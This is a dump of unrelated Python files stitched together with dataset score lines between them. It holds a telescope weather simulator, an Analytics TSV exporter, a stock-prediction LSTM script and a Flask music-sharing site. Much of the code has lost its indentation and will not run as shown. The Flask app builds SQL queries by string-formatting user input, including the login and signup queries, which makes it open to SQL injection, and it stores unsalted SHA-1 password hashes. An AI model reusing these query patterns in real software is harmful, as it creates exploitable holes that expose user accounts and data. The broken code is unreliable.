if not isinstance(time_step, u.Quantity):
time_step = time_step * u.min
self.log = desiutil.log.get_logger()
config = desisurvey.config.Configuration()
ephem = desisurvey.ephem.get_ephem()
if restore is not None:
fullname = config.get_path(restore)
self._table = astropy.table.Table.read(fullname)
self.start_date = desisurvey.utils.get_date(
self._table.meta['START'])
self.stop_date = desisurvey.utils.get_date(
self._table.meta['STOP'])
self.num_nights = self._table.meta['NIGHTS']
self.steps_per_day = self._table.meta['STEPS']
self.replay = self._table.meta['REPLAY']
self.log.info('Restored weather from {}.'.format(fullname))
return
else:
self.log.info('Generating random weather with seed={} replay="{}".'
.format(seed, replay))
gen = np.random.RandomState(seed)
# Use our config to set any unspecified dates.
start_date = config.first_day()
stop_date = config.last_day()
num_nights = (stop_date - start_date).days
if num_nights <= 0:
raise ValueError('Expected start_date < stop_date.')
# Check that the time step evenly divides 24 hours.
steps_per_day = int(round((1 * u.day / time_step).to(1).value))
if not np.allclose((steps_per_day * time_step).to(u.day).value, 1.):
raise ValueError(
'Requested time_step does not evenly divide 24 hours: {0}.'
.format(time_step))
# Calculate the number of times where we will tabulate the weather.
num_rows = num_nights * steps_per_day
meta = dict(START=str(start_date), STOP=str(stop_date),
NIGHTS=num_nights, STEPS=steps_per_day, REPLAY=replay)
self._table = astropy.table.Table(meta=meta)
# Initialize column of MJD timestamps.
t0 = desisurvey.utils.local_noon_on_date(start_date)
times = t0 + (np.arange(num_rows) / float(steps_per_day)) * u.day
self._table['mjd'] = times.mjd
# Generate a random atmospheric seeing time series.
dt_sec = 24 * 3600. / steps_per_day
self._table['seeing'] = desimodel.weather.sample_seeing(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
# Generate a random atmospheric transparency time series.
self._table['transparency'] = desimodel.weather.sample_transp(
num_rows, dt_sec=dt_sec, gen=gen).astype(np.float32)
if replay == 'random':
# Generate a bootstrap sampling of the historical weather years.
years_to_simulate = config.last_day().year - config.first_day().year + 1
history = ['Y{}'.format(year) for year in range(2007, 2018)]
replay = ','.join(gen.choice(history, years_to_simulate, replace=True))
# Lookup the dome closed fractions for each night of the survey.
# This step is deterministic and only depends on the config weather
# parameter, which specifies which year(s) of historical daily
# weather to replay during the simulation.
dome_closed_frac = desimodel.weather.dome_closed_fractions(
start_date, stop_date, replay=replay)
r = gen.uniform(size=num_nights)
r2 = gen.uniform(size=num_nights)
dome_closed_frac[r2 < extra_downtime] = 1.
# Convert fractions of scheduled time to hours per night.
ilo, ihi = (start_date - ephem.start_date).days, (stop_date - ephem.start_date).days
bright_dusk = ephem._table['brightdusk'].data[ilo:ihi]
bright_dawn = ephem._table['brightdawn'].data[ilo:ihi]
dome_closed_time = dome_closed_frac * (bright_dawn - bright_dusk)
# Randomly pick between three scenarios for partially closed nights:
# 1. closed from dusk, then open the rest of the night.
# 2. open at dusk, then closed for the rest of the night.
# 3. open and dusk and dawn, with a closed period during the night.
# Pick scenarios 1+2 with probability equal to the closed fraction.
# Use a fixed number of random numbers to decouple from the seeing
# and transparency sampling below.
self._table['open'] = np.ones(num_rows, bool)
for i in range(num_nights):
sl = slice(i * steps_per_day, (i + 1) * steps_per_day)
night_mjd = self._table['mjd'][sl]
# Dome is always closed before dusk and after dawn.
closed = (night_mjd < bright_dusk[i]) | (night_mjd >= bright_dawn[i])
if dome_closed_frac[i] == 0:
# Dome open all night.
pass
elif dome_closed_frac[i] == 1:
# Dome closed all night. This occurs with probability frac / 2.
closed[:] = True
elif r[i] < 0.5 * dome_closed_frac[i]:
# Dome closed during first part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd < bright_dusk[i] + dome_closed_time[i])
elif r[i] < dome_closed_frac[i]:
# Dome closed during last part of the night.
# This occurs with probability frac / 2.
closed |= (night_mjd > bright_dawn[i] - dome_closed_time[i])
else:
# Dome closed during the middle of the night.
# This occurs with probability 1 - frac. Use the value of r[i]
# as the fractional time during the night when the dome reopens.
dome_open_at = bright_dusk[i] + r[i] * (bright_dawn[i] - bright_dusk[i])
dome_closed_at = dome_open_at - dome_closed_time[i]
closed |= (night_mjd >= dome_closed_at) & (night_mjd < dome_open_at)
self._table['open'][sl][closed] = False
self.start_date = start_date
self.stop_date = stop_date
self.num_nights = num_nights
self.steps_per_day = steps_per_day
self.replay = replay
def save(self, filename, overwrite=True):
"""Save the generated weather to a file.
The saved file can be restored using the constructor `restore`
parameter.
Parameters
----------
filename : str
Name of the file where the weather should be saved. A
relative path name refers to the :meth:`configuration output path
<desisurvey.config.Configuration.get_path>`.
overwrite : bool
Silently overwrite any existing file when this is True.
"""
config = desisurvey.config.Configuration()
filename = config.get_path(filename)
self._table.write(filename, overwrite=overwrite)
self.log.info('Saved weather to {0}.'.format(filename))
def get(self, time):
"""Get the weather conditions at the specified time(s).
Returns the conditions at the closest tabulated time, rather than
using interpolation.
Parameters
----------
time : astropy.time.Time
Time(s) when the simulated weather is requested.
Returns
-------
table slice
Slice of precomputed table containing row(s) corresponding
to the requested time(s).
"""
offset = np.floor(
(time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5
).astype(int)
if np.any(offset < 0) or np.any(offset > len(self._table)):
raise ValueError('Cannot get weather beyond tabulated range.')
return self._table[offset]
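# Usage sketch (illustrative only): assumes the desisurvey configuration has
# already been initialized so that first_day/last_day are defined. The helper
# name and output file name below are made up.
def _demo_weather(seed=123, replay='Y2015', filename='weather_demo.fits'):
    weather = Weather(seed=seed, replay=replay)
    # Look up conditions at the first tabulated time step.
    when = astropy.time.Time(weather._table['mjd'][0], format='mjd')
    conditions = weather.get(when)
    print(conditions['seeing'], conditions['transparency'], conditions['open'])
    weather.save(filename)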
| 2.71875 | 3 |
lib/csv_writer.py | takeratta/ga-dev-tools | 2 | 3438 | # coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API reponse into TSV.
This provides utitlites to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (<NAME>)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
  my_handle = open(file_name, 'wb')
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
object provides two methods, writerow and writerow, which
accepts a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
      self.writer.writerow(['No Results found'])
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
# Replace any first characters that have an = with '=
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
and it's position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
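def DemoOutput():
  """Usage sketch (illustrative only): prints a tiny fabricated response as TSV.
  The field names match what Output() reads; all values are made up.
  """
  fake_response = {
      'profileInfo': {'profileName': 'Demo View'},
      'containsSampledData': False,
      'query': {'ids': 'ga:12345', 'metrics': ['ga:sessions']},
      'columnHeaders': [
          {'name': 'ga:source', 'columnType': 'DIMENSION'},
          {'name': 'ga:sessions', 'columnType': 'METRIC'}],
      'rows': [['google', '100'], ['=cmd', '3']],  # '=cmd' exercises ExcelEscape
      'itemsPerPage': 2,
      'totalResults': 2,
      'totalsForAllResults': {'ga:sessions': '103'},
  }
  GetTsvScreenPrinter().Output(fake_response)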
| 2.921875 | 3 |
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py | yuwenxianglong/zhxsh.github.io | 0 | 3439 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
@Project : RNN_Prediction
@Author : <NAME>
@Filename: stockPrediction202005201318.py
@IDE : PyCharm
@Time1 : 2020-05-20 13:18:46
@Time2 : 2020/5/20 13:18
@Month1 : May
@Month2 : May
"""
import tushare as ts
import tensorflow as tf
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
stock_catl = ts.get_hist_data('300750')
stock_catl = stock_catl.sort_index(ascending=True)
stock_catl = (stock_catl - stock_catl.mean()) / \
(stock_catl.max() - stock_catl.min())
# train, val = train_test_split(stock_catl, test_size=0.5)
# train = train.sort_index(ascending=True)
# val = val.sort_index(ascending=True)
train = stock_catl.iloc[:-60, :]
val = stock_catl.iloc[-60:, :]
window_size = 30
column = 'high'
epoches = 300
def batch_dataset(dataset):
dataset_batched = dataset.batch(window_size, drop_remainder=True)
return dataset_batched
def zip_ds(dataset):
ds_data = tf.constant(dataset.values, dtype=tf.float32)
ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \
window(window_size, shift=1).flat_map(batch_dataset)
ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32)
ds_label = tf.data.Dataset.from_tensor_slices(ds_label)
ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat()
return ds_train
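# Sketch of what the windowing above produces (illustrative only, with a tiny
# integer range instead of stock rows): each element pairs `width` consecutive
# values with the value that immediately follows them, mirroring zip_ds().
def _window_demo(values=10, width=3):
    data = tf.data.Dataset.range(values).window(width, shift=1).flat_map(
        lambda w: w.batch(width, drop_remainder=True))
    labels = tf.data.Dataset.range(width, values)
    # Yields ([0, 1, 2], 3), ([1, 2, 3], 4), ... until the labels run out.
    return tf.data.Dataset.zip((data, labels))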
ds_train = zip_ds(train)
ds_val = zip_ds(val)
model = tf.keras.Sequential(
[
tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'),
tf.keras.layers.LSTM(128, activation='relu'),
tf.keras.layers.Dense(13)
]
)
optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=optimizer, loss='mse')
history = model.fit(
ds_train, epochs=epoches,
steps_per_epoch=5,
validation_data=ds_val,
validation_steps=1
)
model.save('stockLSTM')
# Plot loss function
plt.figure(figsize=(19, 9))
ax = plt.gca()
plt.plot(range(len(history.history['loss'])), history.history['loss'])
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'])
ax.set_yscale('log')
plt.show()
# Compare fitting and real values.
dff = pd.DataFrame()
for i in range(len(stock_catl) - window_size):
fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0)))
dffits = pd.DataFrame(fits, columns=stock_catl.columns)
dff = dff.append(dffits)
dff.index = stock_catl.index[window_size:]
plt.figure(figsize=(19, 9))
dff[column].plot()
stock_catl.iloc[window_size:, :][column].plot(style='-o')
plt.show()
# To predict future 100 business days.
dfp = stock_catl.copy()
for i in range(100):
pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0)))
dfpres = pd.DataFrame(pres, columns=stock_catl.columns)
dfp = dfp.append(dfpres, ignore_index=True)
dfp[column].plot()
plt.show()
| 2.703125 | 3 |
src/mushme.py | MuShMe/MuShMe | 1 | 3440 | <filename>src/mushme.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from src import app
import os
import shutil
from flask import Flask, render_template, session, request, flash, url_for, redirect
from Forms import ContactForm, LoginForm, editForm, ReportForm, CommentForm, searchForm, AddPlaylist
from flask.ext.mail import Message, Mail
from werkzeug import secure_filename
from werkzeug import SharedDataMiddleware
from api import API
from songs import SONG
from playlist import playlist
from admin import admin
from artist import artist
import pymysql
import hashlib
from flask import g
mail = Mail()
mail.init_app(app)
#For the collector script.
app.register_blueprint(API);
#For the songs
app.register_blueprint(SONG);
#For the playlist
app.register_blueprint(playlist);
#for the admin pages
app.register_blueprint(admin);
#for the artist pages
app.register_blueprint(artist);
UPLOAD_FOLDER = "img/ProfilePic/"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
app.config['UPLOAD_FOLDER'] = 'src/static/' + UPLOAD_FOLDER
@app.route('/')
def index():
session["login"] = False
session["signup"] = False
session["logged_in"] = False
return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=ContactForm(prefix='form2'))
#For database connections.
@app.before_request
def before_request():
g.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='<PASSWORD>', db='MuShMe', charset='utf8')
g.database = g.conn.cursor()
@app.teardown_request
def teardown_request(exception):
g.conn.close()
@app.route('/login', methods=['POST'])
def login():
session["login"] = True
session["signup"] = False
if request.method == 'POST':
loginform = LoginForm(request.form, prefix='form1')
if loginform.validate_on_submit():
check_login = g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ %
(loginform.email.data, hashlib.sha1(loginform.password.data).hexdigest()))
if check_login:
userid= g.database.fetchone()
g.database.execute("""UPDATE MuShMe.entries SET Last_Login=CURRENT_TIMESTAMP() WHERE User_id="%s" """ % (userid))
g.conn.commit()
for uid in userid:
session['userid'] = uid
g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid )
session['UserName']=g.database.fetchone()[0]
g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['privilege'] = g.database.fetchone()[0]
g.database.execute("""SELECT Profile_pic FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['profilepic'] = g.database.fetchone()[0]
g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid )
session["Name"]=g.database.fetchone()
g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid )
session["dob"]=str(g.database.fetchone())
session['logged_in'] = True
session['logged_in']=True
#print uid
#print userid
return redirect(url_for('userProfile', userid=uid))
else:
flash("Incorrect Email-Id or Password")
else:
flash("Incorrect Email-Id or Password")
return render_template('homepage/index.html', form1=loginform, form2=ContactForm(prefix='form2'))
else:
return redirect(url_for(('index')))
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
))
@app.route('/signup', methods=['POST'])
def signup():
session["signup"] = True
session["login"] = False
contactform = ContactForm(request.form, prefix='form2')
if contactform.validate_on_submit():
if validate(contactform.email.data,contactform.username.data):
check_signup = g.database.execute("""INSERT into MuShMe.entries (Username,Email_id,Pwdhash,Name) VALUES ("%s","%s","%s","%s")""" %
(contactform.username.data,
contactform.email.data,
hashlib.sha1(contactform.password.data).hexdigest(),contactform.name.data,
))
if check_signup:
g.conn.commit()
g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ %
(contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest()))
user_id = g.database.fetchone()
for uid in user_id:
session['userid'] = uid
g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid )
session['UserName']=g.database.fetchone()[0]
g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['privilege'] = g.database.fetchone()[0]
g.database.execute("""SELECT Profile_Pic FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['profilepic'] = g.database.fetchone()[0]
session['logged_in'] = True
g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid )
session["Name"]=g.database.fetchone()
g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid )
session["dob"]=str(g.database.fetchone())
newPlaylist = session['UserName'] + ' default collection'
g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (newPlaylist,uid))
g.conn.commit()
return redirect(url_for('userProfile',userid=uid))
else:
flash("Please enter valid data !")
else:
flash("Username or Email has been taken")
else:
flash_errors(contactform)
return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=contactform)
def validate(email,username):
email = g.database.execute(""" SELECT * from MuShMe.entries where Email_id="%s" """ % email)
name = g.database.execute(""" SELECT * from MuShMe.entries where Username="%s" """ % username)
if email or name:
return False
else:
return True
@app.route('/user/<userid>',methods=['GET'])
def userProfile(userid):
if session['logged_in'] == False:
return render_template('error.html'), 404
else:
if request.method == 'GET':
User=getUserData(userid)
return render_template('userprofile/index.html', userid=userid,
form4=CommentForm(prefix='form4'), form3=editForm(prefix='form3'),
form6=searchForm(prefix='form6'), form5=ReportForm(prefix='form5'),form7=AddPlaylist(prefix='form7'),
friend=getFriend(userid), playlist=getPlaylist(userid), User=getUserData(userid), Comments=getComments(userid),
songs=getSong(userid), Recommends=getRecommend(userid), Requests=getRequest(userid),frnd=checkFriend(userid,User),
AllComments=getAllComments(userid), AllRecommends=getAllRecommend(userid))
def checkFriend(userid,User):
friendName =[]
g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % (userid))
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
friendName.append(data)
for f in friendName:
a=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid']))
b=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid']))
if a or b:
return True
elif userid == f['friendid']:
return True
else:
return False
g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
friendName.append(data)
for f in friendName:
a=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid']))
b=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid']))
if a or b:
return True
elif userid == f['friendid']:
return True
else:
return False
def getAllComments(userid):
g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC" % (userid))
commentids = g.database.fetchall()
retval = []
for commentid in commentids:
g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0]))
commentdata = g.database.fetchone()
data = {}
data['comment'] = commentdata[0]
data['userid'] = commentdata[1]
data['commentid'] = commentid[0]
g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid']))
data['username'] = g.database.fetchone()[0]
retval.append(data)
return retval
def getComments(userid):
g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC LIMIT 5" % (userid))
commentids = g.database.fetchall()
retval = []
for commentid in commentids:
g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0]))
commentdata = g.database.fetchone()
data = {}
data['comment'] = commentdata[0]
data['userid'] = commentdata[1]
data['commentid'] = commentid[0]
g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid']))
data['username'] = g.database.fetchone()[0]
retval.append(data)
return retval
def getFriend(userid):
friendName =[]
g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
data['friendpic']=a[2]
friendName.append(data)
g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
data['friendpic']=a[2]
friendName.append(data)
print friendName
return friendName
def getPlaylist(userid):
playlist = []
g.database.execute("""SELECT Playlist_name,Playlist_id from MuShMe.playlists WHERE User_id="%s" """ % userid)
for p in g.database.fetchall():
data = {}
data['pname']=p[0]
data['pid']=p[1]
playlist.append(data)
return playlist
def getSong(userid):
songName = []
g.database.execute("""SELECT Song_id from MuShMe.user_song WHERE User_id=%s LIMIT 5""" % userid)
for song in g.database.fetchall():
data = {}
g.database.execute("""SELECT Song_title,Song_id,Song_Album from MuShMe.songs WHERE Song_id="%s" """ % song)
for a in g.database.fetchall():
data['songname']=a[0]
data['songid']=a[1]
g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s " % (a[2]))
g.conn.commit()
data['art'] = g.database.fetchone()[0]
songName.append(data)
return songName
def getUserData(userid):
User = []
g.database.execute(""" SELECT Username,User_id,Profile_pic,Privilege,Email_id,Name,DOB from entries where User_id="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['username']=a[0]
data['userid']=a[1]
data['profilepic'] = a[2]
data['privilege']=a[3]
data['email']=a[4]
data['name']=a[5]
data['dob']=str(a[6])
User.append(data)
return User
def getAllRecommend(userid):
recommend =[]
g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['rid']=a[0]
data['userfrom'] = a[1]
data['userto']=a[2]
g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1])
data['userfromname'] = g.database.fetchone()[0]
check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0])
if check_song:
songid = g.database.fetchone()[0]
data['song'] = []
g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid)
for song in g.database.fetchall():
d = {}
d['title']=song[0]
d['album'] = song[1]
d['genre'] = song[2]
d['publisher'] = song[3]
d['songid'] = songid
data['song'].append(d)
check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0])
if check_playlist:
playlistid = g.database.fetchone()[0]
data['playlist'] = []
g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid)
for p in g.database.fetchall():
d= {}
d['pname']=p[0]
d['pid']=p[1]
g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2])
for k in g.database.fetchall():
d['username']=k[0]
d['uname']=k[1]
d['userid']=k[2]
data['playlist'].append(d)
recommend.append(data)
return recommend
def getRecommend(userid):
recommend =[]
g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" LIMIT 5 """ % userid)
for a in g.database.fetchall():
data={}
data['rid']=a[0]
data['userfrom'] = a[1]
data['userto']=a[2]
g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1])
data['userfromname'] = g.database.fetchone()[0]
print data['userfromname']
check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0])
if check_song:
songid = g.database.fetchone()[0]
data['song'] = []
g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid)
for song in g.database.fetchall():
d = {}
d['title']=song[0]
d['album'] = song[1]
d['genre'] = song[2]
d['publisher'] = song[3]
d['songid'] = songid
d['songart'] = getSongArt(songid)
data['song'].append(d)
check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0])
if check_playlist:
playlistid = g.database.fetchone()[0]
data['playlist'] = []
g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid)
for p in g.database.fetchall():
d= {}
d['pname']=p[0]
d['pid']=p[1]
g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2])
for k in g.database.fetchall():
d['username']=k[0]
d['uname']=k[1]
d['userid']=k[2]
data['playlist'].append(d)
recommend.append(data)
return recommend
def getRequest(userid):
request =[]
g.database.execute(""" SELECT Request_id,Request_from,Request_to,Status from requests where Request_to="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['reqid']=a[0]
data['reqfrom'] = a[1]
data['reqto']=a[2]
data['status']=a[3]
data['reqfromuser'] = []
g.database.execute(""" SELECT User_id,Username,Name from entries where User_id='%s' """ % a[1])
for i in g.database.fetchall():
d={}
d['userid'] = i[0]
d['username'] = i[1]
d['name'] = i[2]
data['reqfromuser'].append(d)
print data
request.append(data)
return request
def getSongArt(songid):
g.database.execute("SELECT Song_Album FROM songs WHERE song_id=%s", (songid))
albumname = g.database.fetchone()[0]
g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s", (albumname))
return g.database.fetchone()[0]
@app.route('/user/<userid>/edit',methods=['POST','GET'])
def editName(userid):
if request.method == 'POST':
uid = userid
print request.form
if request.form['editname'] != '':
g.database.execute("""UPDATE MuShMe.entries SET Name=%s WHERE User_id=%s """, ([request.form['editname']], userid))
g.conn.commit()
if request.form['birthday_year'] != '0' and request.form['birthday_month'] != '0' and request.form['birthday_day'] != '0':
g.database.execute("""UPDATE MuShMe.entries SET DOB="%s-%s-%s" WHERE User_id="%s" """ % (request.form['birthday_year'],request.form['birthday_month'],request.form['birthday_day'], userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
else:
return redirect(url_for('userProfile', userid=userid))
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
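# Illustrative behaviour (added): the extension check is case-sensitive and
# only accepts the lowercase extensions listed in ALLOWED_EXTENSIONS.
#   >>> allowed_file('avatar.png')
#   True
#   >>> allowed_file('avatar.PNG')
#   False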
